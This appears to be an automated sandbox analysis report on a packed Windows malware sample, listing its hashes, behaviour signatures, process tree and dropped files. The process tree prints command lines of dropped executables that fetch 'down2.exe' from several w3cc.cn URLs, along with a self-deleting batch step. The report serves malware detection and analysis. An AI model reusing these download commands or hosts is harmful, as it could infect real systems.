Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29/02/2024, 06:45

General

  • Target

    adf042c909d919ccca72d1bcf7338e71.exe

  • Size

    175KB

  • MD5

    adf042c909d919ccca72d1bcf7338e71

  • SHA1

    bf9be4f139b3742d94593f3079f1f8836e5f5bb4

  • SHA256

    71580c963cd1262975add67f9c585bd6137753653ae1270c5177b0708ba9b0bd

  • SHA512

    d8df82387b3b5630f14cb143b5c0e890f49fbd23cc298d8dca1dbe839ce8dc00bb0eb8f75ce546c33242b75e413625fe52f469416b316628f1bf10d3129db173

  • SSDEEP

    3072:C5YS+FskKww99rNeht/ry7LOp9NxTzW8U6Ao1Tcfk8BIo8/qDjrlXZ4EhNWwH:CSvVtw/Ijy7SpPn7LFSjrlXZ4E1

Score
7/10

Malware Config

Signatures

  • ASPack v2.12-2.42 1 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 5 IoCs
  • Drops file in System32 directory 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe
    "C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe"
    1⤵
    • Checks computer location settings
    • Drops file in System32 directory
    • Suspicious use of WriteProcessMemory
    PID:2700
    • C:\Windows\SysWOW64\SOupMF.exe
      "C:\Windows\system32\SOupMF.exe" showautoC:\Windows\system32\RQYknvIR.dll
      2⤵
      • Executes dropped EXE
      PID:3060
    • C:\Windows\SysWOW64\DMWgpy.exe
      "C:\Windows\system32\DMWgpy.exe" C:\Windows\system32\JSNVfa2.exe http://x2.w3cc.cn/dw/down2.exe
      2⤵
      • Executes dropped EXE
      • Drops file in System32 directory
      • Suspicious use of WriteProcessMemory
      PID:3096
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c C:\Windows\system32\DelCAD.bat
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4372
        • C:\Windows\SysWOW64\PING.EXE
          ping -n 5 127.0.0.1
          4⤵
          • Runs ping.exe
          PID:400
    • C:\Windows\SysWOW64\xBjOcu.exe
      "C:\Windows\system32\xBjOcu.exe" C:\Windows\system32\vEzIRa2.exe http://x3.w3cc.cn/dw/down2.exe
      2⤵
      • Executes dropped EXE
      • Drops file in System32 directory
      • Suspicious use of WriteProcessMemory
      PID:3884
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c C:\Windows\system32\DelCAD.bat
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2060
        • C:\Windows\SysWOW64\PING.EXE
          ping -n 5 127.0.0.1
          4⤵
          • Runs ping.exe
          PID:1928
    • C:\Windows\SysWOW64\RMsoSA.exe
      "C:\Windows\system32\RMsoSA.exe" C:\Windows\system32\DyeLGo2.exe http://x4.w3cc.cn/dw/down2.exe
      2⤵
      • Executes dropped EXE
      PID:3108
    • C:\Windows\SysWOW64\eytYFB.exe
      "C:\Windows\system32\eytYFB.exe" C:\Windows\system32\sFAvzS2.exe http://x3.w3cc.cn/dw/down2.exe
      2⤵
      • Executes dropped EXE
      PID:5104

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Windows\SysWOW64\DMWgpy.exe

          Filesize

          35KB

          MD5

          78cd588e48bf05f83ac4d2e5bd3d32e2

          SHA1

          c96060325a397b397a1d60076ce6e2c11f309a4f

          SHA256

          5309590bc560b29b521f62e20b8d31ef848501814542939b6b943add30afa85e

          SHA512

          8cddb7332eec1e036b8466dd07c36557e471e531bfb191254d9c79d1212115378adc0a3111b983c168ce9fe09230ed1797dca4ab30fe16c3f735b98cee273e65

        • C:\Windows\SysWOW64\DelCAD.bat

          Filesize

          141B

          MD5

          544926ed36528740dfc1d64a602e6d5c

          SHA1

          7837ae9e7da6054b79b1f1cbe810d838ed0ee3c5

          SHA256

          6e7bd49e44ffa47502cceb6fcf39dcb048d716cbe9f95b360c145b5fea64eec7

          SHA512

          8425d3c4282b576878c5ecc2a327634399338e626fd738192d2c766f8ecfa7f4bf539b476757c9174f111b6b7d108a39f90aaffcdc4b93ffda65b5594cb7210b

        • C:\Windows\SysWOW64\DelCAD.bat

          Filesize

          141B

          MD5

          9c439a87b83755cde8511cf65e13e54e

          SHA1

          a72df147498f15d16d4004f73733d2602390e981

          SHA256

          d7c7639aa7fbe036c11bf35908fb2aa26171902482bb250233af19cd8f655bf3

          SHA512

          c483a77a2496f2daca73613be8a317c6fbf92de9cb569a0dd75a27f30fa4d6f251a4a1d26e3808716128cf4f48c72cbd81b5380c9b2d981be9be300eb49155eb

        • C:\Windows\SysWOW64\SOupMF.exe

          Filesize

          175KB

          MD5

          adf042c909d919ccca72d1bcf7338e71

          SHA1

          bf9be4f139b3742d94593f3079f1f8836e5f5bb4

          SHA256

          71580c963cd1262975add67f9c585bd6137753653ae1270c5177b0708ba9b0bd

          SHA512

          d8df82387b3b5630f14cb143b5c0e890f49fbd23cc298d8dca1dbe839ce8dc00bb0eb8f75ce546c33242b75e413625fe52f469416b316628f1bf10d3129db173

        • memory/3096-17-0x0000000000400000-0x0000000000418000-memory.dmp

          Filesize

          96KB

        • memory/3096-49-0x0000000000400000-0x0000000000418000-memory.dmp

          Filesize

          96KB

        • memory/3108-52-0x0000000000400000-0x0000000000418000-memory.dmp

          Filesize

          96KB

        • memory/3884-31-0x0000000000400000-0x0000000000418000-memory.dmp

          Filesize

          96KB

        • memory/3884-70-0x0000000000400000-0x0000000000418000-memory.dmp

          Filesize

          96KB

        • memory/5104-73-0x0000000000400000-0x0000000000418000-memory.dmp

          Filesize

          96KB